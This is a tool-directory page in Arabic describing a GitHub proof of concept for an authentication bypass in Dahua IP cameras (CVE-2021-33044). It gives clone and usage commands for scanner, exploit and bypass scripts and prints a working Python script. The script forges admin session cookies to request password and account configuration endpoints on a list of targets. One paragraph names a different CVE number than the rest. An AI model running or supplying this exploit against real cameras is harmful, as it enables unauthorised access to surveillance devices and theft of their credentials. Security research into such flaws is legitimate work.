Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
أدوات/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
المصادقة والترخيصأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

عرض المستودع
9منذ 2 أشهرلم تتم المراجعة بعد

محاكاة استغلال تجاوز المصادقة في Dahua PoC (CVE-2021-33044)

نظرة عامة

كاميرات IP من Dahua هي أجهزة إنترنت الأشياء شائعة الاستخدام في أنظمة المراقبة الأمنية. ونظرًا لانتشارها في الشبكات الداخلية أو الوصول إليها عبر الإنترنت، فإن الثغرات الأمنية في كاميرات IP قد تؤثر بشكل خطير على الخصوصية وأمن المعلومات.

CVE-2021-33045 هي ثغرة أمنية موجودة في بعض سلسلة كاميرات Dahua، تسمح بالوصول غير المصرح به إلى موارد التهيئة الداخلية دون الحاجة إلى مصادقة صالحة. تنشأ هذه الثغرة من آلية التحكم في الوصول غير المحكمة في البرنامج الثابت للجهاز.

معلومات الثغرة

العنصرالمحتوى
CVECVE-2021-33044
النوعتجاوز المصادقة
المستوىحرج (CVSS ~9.8)
المصادقةلا حاجة للمصادقة
التأثيركاميرات Dahua / DVR / NVR

السبب

تنشأ الثغرة من تصميم مصادقة غير آمن في البرنامج الثابت لكاميرات Dahua:

  • لا يتحقق الخادم من الجلسة/الرمز المميز بشكل صحيح
  • يثق في البيانات المرسلة من العميل
  • بعض نقاط النهاية الحساسة للتكوين تتحقق فقط من وجود ملف تعريف الارتباط، ولا تتحقق من صلاحية الوصول الفعلية

هذا يسمح للمهاجم بـ:

  • تزوير عملية المصادقة
  • تجاوز تسجيل الدخول بالكامل

المراجع:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

آلية عمل آلية تجاوز المصادقة

التدفق الطبيعي

root@kitploit:~
→ يرسل العميل طلب HTTP مع ملف تعريف ارتباط عشوائي
→ تتحقق الكاميرا من ملف تعريف الارتباط على مستوى الواجهة
→ لا يتم التحقق من صحة الجلسة في النهاية الخلفية
→ يُسمح بالوصول المباشر إلى نقاط النهاية الداخلية للتكوين
→ يتم إرجاع البيانات الحساسة

السيناريو

الملف

كيفية الاستخدام

التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

مسح الشبكة

root@kitploit:~
# مسح الشبكة الفرعية (المنافذ مطلوبة)
python dahua_scanner.py https://example.com -p 80 8080 8800

# مضيف واحد مع منفذ
python dahua_scanner.py https://example.com

المنافذ الشائعة لـ Dahua: 80,443, 8080, 37777, 37778

استغلال الثغرة CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

تجاوز المصادقة

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # تفريغ الجهاز بعد التجاوز

مثال

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

الشرح

  • يستخدم السكريبت مكتبة requests ويقوم بتعطيل تحذيرات SSL بشكل نشط لتعطيل تحذيرات SSL

  • دالة dump_accounts(ip, port=80) هي الدالة الرئيسية المسؤولة عن فحص جهاز الكاميرا. الوظيفة الرئيسية للدالة هي:

    • بناء عنوان URL من عنوان IP والمنفذ
    • محاكاة حالة تسجيل دخول المسؤول عبر ملفات تعريف الارتباط
    • إرسال الطلبات إلى نقاط النهاية الحساسة للتكوين
    • تحليل الاستجابة لتحديد ما إذا كان الجهاز متأثرًا أم لا
  • محاكاة ملفات تعريف الارتباط للمصادقة. تستخدم الدالة قيم ملفات تعريف الارتباط مثل:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • في إصدارات الكاميرات المتأثرة، لا تتحقق النهاية الخلفية من sessionID الفعلي، مما يؤدي إلى اعتقاد النظام أن الطلب مرسل من حساب مسؤول صالح.

حلقة معالجة قائمة الأهداف

يقرأ السكريبت قائمة الأهداف من ملف الإدخال، ويستدعي دالة الفحص لكل جهاز بدوره. يتيح هذا الأسلوب تقييم العديد من الكاميرات بشكل تلقائي.

image

عملية التطوير

تم تطوير هذه السكريبتات بناءً على:

  • تفاصيل CVE المنشورة من NVD
  • إشعارات الأمان من Dahua
  • مراجع PoC العامة (seclists.org, packetstormsecurity)

حالة الاختبار:

  • تم تنفيذ منطق تجاوز المصادقة وفقًا لمواصفات CVE
  • تم الاختبار بشكل محدود على الأجهزة المعرضة للخطر.

ملاحظة

هذا المشروع:

  • للاستخدام التعليمي والبحثي فقط
  • يُرجى تشغيله في بيئة مختبر شخصية
تنزيل الأداة
الغرض
CVEs
dahua_scanner.pyاكتشاف الشبكة — البحث عن كاميرات Dahua في الشبكة الفرعيةالكشف
dahua_exploit.pyأداة المسح متعدد الثغرات — التحقق من جميع الثغرات الأمنية.الكل
dahua_auth_bypass.pyتجاوز المصادقة المتخصص مع خيار --dumpCVE-2021-33044